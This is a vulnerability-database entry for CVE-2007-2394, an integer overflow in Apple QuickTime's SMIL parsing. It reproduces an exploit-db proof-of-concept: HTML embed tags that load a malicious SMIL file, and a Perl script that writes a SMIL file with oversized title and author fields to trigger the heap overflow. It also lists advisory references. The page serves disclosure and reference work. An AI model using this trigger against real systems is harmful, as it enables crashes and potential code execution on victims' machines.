Apple QuickTime 整数溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113289 漏洞类型 输入验证
发布时间 2007-07-11 更新时间 2007-07-18
CVE编号 CVE-2007-2394 CNNVD-ID CNNVD-200707-274
漏洞平台 Multiple CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/30292
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-274
|漏洞详情
AppleQuickTime是一款流行的多媒体播放器,支持多种媒体格式。MacOSX平台上的AppleQuicktime存在整数溢出漏洞。QuickTime没有正确地处理SMIL文件中的标题和作者字段。在解析SMIL文件计算时可能导致分配不充分的内存,然后在从SMIL文件拷贝用户提供数据时会触发堆溢出,导致执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/24873/info

Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities.

Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites.

Successful exploits may allow attackers to execute arbitrary code in the context of a user running the vulnerable application or to obtain sensitive information. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. 

----------------------------------------------------------------------
ATTACK VECTORS
----------------------------------------------------------------------

This vulnerability can be triggered by luring a target user into
running a malicious SMIL file locally or via a webpage. In the later
scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used:

<OBJECT
  CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
  CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab"
  WIDTH="10" HEIGHT="10" >
  <!-- malicious SMIL file -->
  <PARAM NAME="src" VALUE="poc.smil" />
  <EMBED
    <!-- available .qtif or .mov file to start up QT for FF -->
    SRC="available-sample.qtif"
    <!-- malicious SMIL file -->
    QTSRC="poc.smil"
    WIDTH="10" HEIGHT="10"
    PLUGINSPAGE=" www.apple.com/quicktime/download"
    TYPE="video/quicktime"
  />
</OBJECT>

----------------------------------------------------------------------
PROOF OF CONCEPT
----------------------------------------------------------------------

#!/usr/bin/perl -w

####
# QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC
#
# Researched on QuickTime 7.1.3 on Windows 2000 SP4.
#
# David Vaartjes <d.vaartjes at gmail.com>
####

$file = " poc.smil";
$padd = "x";
$cop_len = 36;

####
# By choosing the following lengths the
# integer overflow will be triggered.
####

$tit_len = 223;
$auth_len = 65280;

open(FH,">$file") or die "Can't open file:$!";

print FH
 "<smil>\n".
 "<head>\n".
 " <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n".
 " <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n".
 " <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n".
 "</head>\n".
 "</smil>";

close(FH);
|参考资料

来源:US-CERT
名称:TA07-193A
链接:http://www.us-cert.gov/cas/techalerts/TA07-193A.html
来源:VUPEN
名称:ADV-2007-2510
链接:http://www.frsirt.com/english/advisories/2007/2510
来源:SECUNIA
名称:26034
链接:http://secunia.com/advisories/26034
来源:APPLE
名称:APPLE-SA-2007-07-11
链接:http://lists.apple.com/archives/Security-announce/2007/Jul/msg00001.html
来源:IDEFENSE
名称:20070711AppleQuickTimeSMILFileProcessingIntegerOverflowVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556
来源:docs.info.apple.com
链接:http://docs.info.apple.com/article.html?artnum=305947
来源:XF
名称:quicktime-smil-overflow(35357)
链接:http://xforce.iss.net/xforce/xfdb/35357
来源:BID
名称:24873
链接:http://www.securityfocus.com/bid/24873
来源:SECTRACK
名称:1018373
链接:http://www.securitytracker.com/id?1018373
来源:BUGTRAQ
名称:20070717Re:iDefenseSecurityAdvisory07.11.07:AppleQuickTimeSMILFileProcessingIntegerOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/473882/100/100/threaded